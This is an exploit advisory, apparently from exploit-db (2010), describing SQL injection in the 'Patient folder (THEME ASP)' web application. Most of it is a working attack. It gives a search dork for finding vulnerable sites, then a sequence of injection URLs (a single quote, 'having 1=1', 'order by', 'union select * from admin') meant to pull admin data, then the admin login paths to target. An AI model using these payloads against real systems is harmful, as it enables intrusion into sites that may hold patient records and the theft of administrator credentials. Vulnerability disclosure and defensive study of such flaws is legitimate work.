Patient folder (THEME ASP) – SQL Injection

  • 作者: SA H4x0r
    日期: 2010-05-31
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12833/
  • ============================================================
Patient folder (THEME ASP) Local SQL Injection Vulnerability
============================================================

-----------------------------------
By: SA H4x0r-
Emails: ww0@hotmail.com -
Date: 2010/05/31-
-----------------------------------
=====================================================================

Search: "profil.asp?id=" OR "asp?id="
Author:SA H4x0r
Contact: ww0[at]hotmail.com
Data: 2010-05-31 
=====================================================================

Description:

Inject script asp to tell the script to take them infected .. 

=====================================================================

 --=[ Vuln C0de ]=-

 [-] com/profil.asp?id
 [-] xxx/xxxxxx.asp?id

-----------------------------------------------------------------------------------------

Directions: 

http://[Site].com/profil.asp?id=1' <<< To show us the site involved or not

http://[Site].com/profil.asp?id=1 having 1=1 << Here is a guide on the site downstream

Look: 

[Microsoft][ODBC Microsoft Access Driver] HAVING clause (1=1) without grouping or aggregation. 

okey ;) 

http://[Site].com/profil.asp?id=1 order by 1 

http://[Site].com/profil.asp?id=1 union select * from admin

Control panel: http://[Site].com/admin "OR" http://[Site].com/login

-----------------------------------------------------------------------------------------

-=[ P0C ]=-

 http://127.0.0.1/profile/profil.asp?id=[SQL ASP]

 http://127.0.0.1/.asp?id=[SQL ASP]

=========================| -=[ E0F ]=- |=========================

Gr33t'z; Dmar Skood - VirUs_Ra3ch - Mr_QlQ - v4 Team - XP10_HackEr